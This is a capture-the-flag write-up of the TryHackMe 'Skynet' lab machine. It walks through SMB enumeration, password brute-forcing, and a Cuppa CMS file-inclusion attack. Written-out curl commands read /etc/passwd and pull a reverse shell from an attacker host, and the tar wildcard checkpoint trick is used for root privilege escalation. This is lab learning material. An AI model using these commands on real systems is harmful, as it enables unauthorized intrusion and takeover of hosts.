Tryhackme.com Skynet

This was a really fun machine that exposed an anonymous samba share which gave info on a user and that their passwords will have to be changed. You find a log file which contains to be what looks like passwords. Using this log file and the info from the samba share I get into the user’s share and reveal a secret web directory. This runs a vulnerable CMS which allows you to get shell.

Priv Esc was interested and something I’ve not come across. Taking advantage of a cron job tarring up files using a wildcard, I could include my own reverse shell and get it to run.

Never has a way to stop the machine seemed so right

Port 80 reveals a website which just contains an image and a text bar but doesn’t accept any inputs

I ran dirsearch on it to reveal hidden directories

/admin jumps out at me but thats a 301 forbidden with no redirect. /squirrelmail has a 301 but has a redirect to http://10.10.42.11/squirrelmail/src/login.php

After trying default and common creds. I looked in searchsploit

Looking back at the nmap scan I see there is a smb port open 445.

There are several shares but only 1 has read only access. There is also a few directories and a text file. I download the text file and read the contents. I also notice a milesdyson share – likely a username.

I wonder if the new password has been emailed to him.

Using smbmap -H 10.10.42.11 -R lists all files. I see there is a log1.txt, log2.txt. log3.txt file. I download the log1.txt as its the only log file that is not zero bytes.

Using Kali’s file viewer i browse to the share and open the logs1.txt. Sometimes it’s just easier with a GUI!

It looks like a password list. I didn’t want to go through them individually so i fired up burp as I wasn’t having any joy with hydra. If you have done with hydra it please comment your command.

and added the log1.txt file

Looking for the length to be different to most of the other payloads

It worked and got logged in

So now I have a samba password which I can use to login to miles’ share.

There is another text file called important.txt

It reveals a directory in the webserver which Fuzzing would have taken years to get and that isn’t in any wordlist.

“The Terminator: let me try mine (loads dirsearch)”

/administrator reveals cuppa CMS

again default, common creds as well as miles’ password doesn’t work. Neither does the log1.txt file using burp.

Searchsploit reveals an exploit

When the output is encoded in base64 you can get curl to decode it automatically

curl -s --data-urlencode urlConfig=../../../../../../../../../etc/passwd http://10.10.42.11/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?

I noticed that in the exploit notes that I can do a RFI

I create a rshell calling it shell.php

I could not get shell. For some reason the php code was be outputting in base64 instead of being executed

I then realised I had the wrong parameters in the address.

curl http://10.10.42.11/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.8.5.219/shell.php

and not

curl http://10.10.42.11/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=php://filter/convert.base64-encode/resource=http://10.8.5.219/shell.php

to get full tty

On victim
python -c 'import pty;pty.spawn("/bin/bash")'
Ctrl-z
On attacker
echo $TERM # note down
stty -a # note down rows and cols
stty raw -echo # this may be enough
fg
On victim
reset
export SHELL=bash
export TERM=xterm256-color
stty rows 38 columns 225

I shared my linux priv esc scripts on a webserver and downloaded them to the box

https://guide.offsecnewbie.com/privilege-escalation/linux-pe#copy-them-over

wget -nd -np -R "index.html*" -P /tmp/rowbot --recursive http://10.8.5.219

I always like to see what is running on the box first so I chmod +x everything and run pspy64. I double check to see if its 64 bit arch and it is

Linux skynet 4.8.0-58-generic #63~16.04.1-Ubuntu SMP Mon Jun 26 18:08:51 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux

I give it a minute and see a cron job running

root is running this (UID=0) and by the looks of the backup.sh file there is a wildcard which I can take advantage of

So root is tarring everything in the /var/www/html folder

I googled tar and wildcards and priv esc and found https://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt

–checkpoint-action=exec=sh rootshell.sh’ are passed to the
‘tar’ program as command line options. Basically, they command tar to execute shell.sh
shell script upon the execution.

So, with this tar argument pollution, we can basically execute arbitrary commands
with privileges of the user that runs tar. As demonstrated on the ‘root’ account above.

I run pspy64 to see the commands being run